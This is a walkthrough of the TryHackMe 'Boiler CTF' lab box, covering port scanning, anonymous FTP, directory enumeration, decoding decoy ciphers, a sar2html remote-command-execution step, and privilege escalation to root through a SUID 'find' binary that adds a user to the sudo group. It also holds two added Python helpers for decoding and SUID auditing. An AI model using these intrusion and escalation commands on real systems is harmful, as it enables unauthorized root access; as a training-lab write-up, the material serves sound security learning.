BoilerCTF - TryHackMe Walkthrough
Intermediate level CTF. Just enumerate, you’ll get there. This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.
URL: Boiler CTF
This article will primarily be focusing on owning the system, and less focus on answering the questions presented by the challenge. However, most of the answers are found when doing so anyway.
We are given the IP 10.10.0.15. Run an nmap scan with the following command (all ports, version/script detection, normal-format output to a file called portscan):
nmap -p- -A -oN portscan 10.10.0.15
I initially got a host down message, so I adjusted my nmap command to the following:
nmap -p- -A -Pn -oN portscan 10.10.208.159
These are the open ports:
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.6.63
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
I’d like to explore the FTP server as Anonymous login is allowed. This is always a terrible way to have your FTP server configured, as it lets anyone log in with the username anonymous and any password, so every file on the share is effectively public:
ftp 10.10.208.159
(log in with the name anonymous and any password)
There is a hidden file:
Let’s transfer this over to our local machine.
The file seems to contain an encrypted message:
This seems like a simple letter substitution cipher such as a Caesar cipher or ROT13. I used an online ROT13 decryptor:
This seems like a rabbit hole. Let’s move onto enumerating the next port.
I’ll open up port 80 on my browser:
This looks like the standard Apache2 default page. Let’s run a dirb scan to find any hidden paths:
We’ve got a couple of interesting results: robots.txt and Joomla. Joomla is a CMS, which may provide us with an attack surface.
Let’s investigate the robots.txt file:
Some of these are most likely rabbit holes by the looks of it. It’s important to always explore every path.
All the disallowed paths give a 404 not found error.
A closer look at the following code:
079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
These are decimal ASCII codes; converting them gives a base64 string, which in turn decodes to what looks like an MD5 hash, but again it’s another rabbit hole.
Here is the /joomla directory:
I want to run a dirb scan on this URL to find more information:
There are a few rabbit holes again:
This is a Caesar cipher with a shift of 2:
Just messing around.
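The two decode steps above (the decimal-ASCII blob from robots.txt and the shift ciphers met twice on this box), as an added Python example that is not part of the original walkthrough. The blob is copied from the page; the shift-2 sample is constructed by re-encoding the page’s decoded phrase, not taken from the site.

```python
import base64
import string

# The blob as printed on the page under robots.txt: decimal ASCII codes.
ROBOTS_BLOB = (
    "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 "
    "090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 "
    "089 109 070 104 078 084 069 049 079 068 081 075"
)

def decimal_ascii(text):
    # Turn space-separated decimal codes into a string ("079" -> "O").
    return "".join(chr(int(code)) for code in text.split())

def decode_chain(blob):
    # Decimal ASCII -> base64 -> text, then check whether the result has the
    # shape of an MD5 digest (32 hex characters), which is how the page classed it.
    b64 = decimal_ascii(blob)
    decoded = base64.b64decode(b64, validate=True).decode("ascii").strip()
    md5_shape = len(decoded) == 32 and all(c in string.hexdigits for c in decoded)
    return b64, decoded, md5_shape

def caesar(text, shift):
    # Shift letters back by `shift` to decrypt; shift=13 is ROT13 (its own inverse).
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

if __name__ == "__main__":
    b64, digest, md5_shape = decode_chain(ROBOTS_BLOB)
    print(b64)
    print(digest, "looks like MD5:", md5_shape)
    # Constructed sample: the page's decoded phrase shifted forward by 2.
    print(caesar("Lwuv oguukpi ctqwpf.", 2))
```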
Here we are presented with a sar2html tool. I looked this up online and found an exploit.
Here is an exploitDB page on an RCE exploit:
We can execute our own command using the URL:
Then “press “select # host” then your command’s output will appear bottom side of the scroll screen.”
I have entered “id” into the url:
The RCE has been proven to work. There is a file called log.txt. Executing this URL will show the contents of log.txt:
This has given us a username and password (censored). Let’s use this to connect over SSH. As we identified earlier, port 55007 is open for SSH, so we need to specify this port when connecting:
ssh [censored]@10.10.208.159 -p 55007
Upgrade the shell with the following command:
python -c 'import pty; pty.spawn("/bin/bash")'
There is a script in the current directory called backup.sh:
There are credentials for the user “stoner” in plain text.
Let’s change to this user:
su stoner [censored]
We have some hidden files in stoner’s home directory /home/stoner:
The .nano is empty and .secret is the user.txt file. I spent a while looking for an actual file called user.txt but turns out it’s this.
Let’s check sudo rights:
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa
Not that helpful, as this path doesn’t exist and we don’t have permission to create the directory.
The next method I usually go for is finding any interesting SUID binaries. This is a great article about SUID Binaries:
The following command lists all SUID binaries owned by root on the system (-perm -4000 matches the setuid bit; errors for unreadable directories are discarded):
find / -user root -perm -4000 -print 2>/dev/null
I understand that /usr/bin/find can be exploited when it is SUID root.
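The detection side of the enumeration above, as an added Python example that is not part of the original walkthrough: it mirrors find / -perm -4000, compares the result with a known-good baseline, and flags binaries that should never carry the setuid bit. The sample tree is constructed with tempfile; only find is taken from the page as a never-SUID binary.

```python
import os
import stat
import tempfile

# Binaries that hand out arbitrary command execution when SUID root.
# The page names only find; extend this set from your own baseline review.
NEVER_SUID = {"find"}

def find_suid(root):
    # Python counterpart of `find / -perm -4000`: regular files with the setuid
    # bit set. The `-user root` filter is left out so the demo runs without root.
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entry, same as the CLI's 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def audit(root, baseline):
    # Returns (unexpected, dangerous): SUID paths missing from the known-good
    # baseline, and SUID paths named in NEVER_SUID regardless of the baseline.
    rel = {os.path.relpath(p, root) for p in find_suid(root)}
    unexpected = sorted(rel - set(baseline))
    dangerous = sorted(p for p in rel if os.path.basename(p) in NEVER_SUID)
    return unexpected, dangerous

def demo():
    # Constructed tree: passwd is legitimately SUID, find wrongly SUID, ls is not.
    root = tempfile.mkdtemp()
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("find", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return audit(root, baseline={"usr/bin/passwd"})

if __name__ == "__main__":
    unexpected, dangerous = demo()
    print("SUID but not in baseline:", unexpected)
    print("remove the bit (chmod u-s):", dangerous)
```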
Privilege Escalation Using Find SUID Binary
The exploitation of this binary is quite straightforward. Because find is SUID root, anything it runs through -exec runs as root. Let’s create a dummy file called cybergoat.txt in stoner’s home directory:
And let’s use the following command to “find” that file and execute our own command:
find cybergoat.txt -exec whoami \;
That’s great, we have successfully executed whoami as root. The following command adds a user to the Sudo Group on Linux:
usermod -aG sudo [user]
So let’s add that into the find command:
find cybergoat.txt -exec usermod -aG sudo stoner \;
su stoner
The su stoner is needed so the new group membership takes effect in the shell. As you can see, stoner can now execute any command via sudo. Now we can get a root shell and find the last flag:
sudo /bin/bash
cd /root
cat root.txt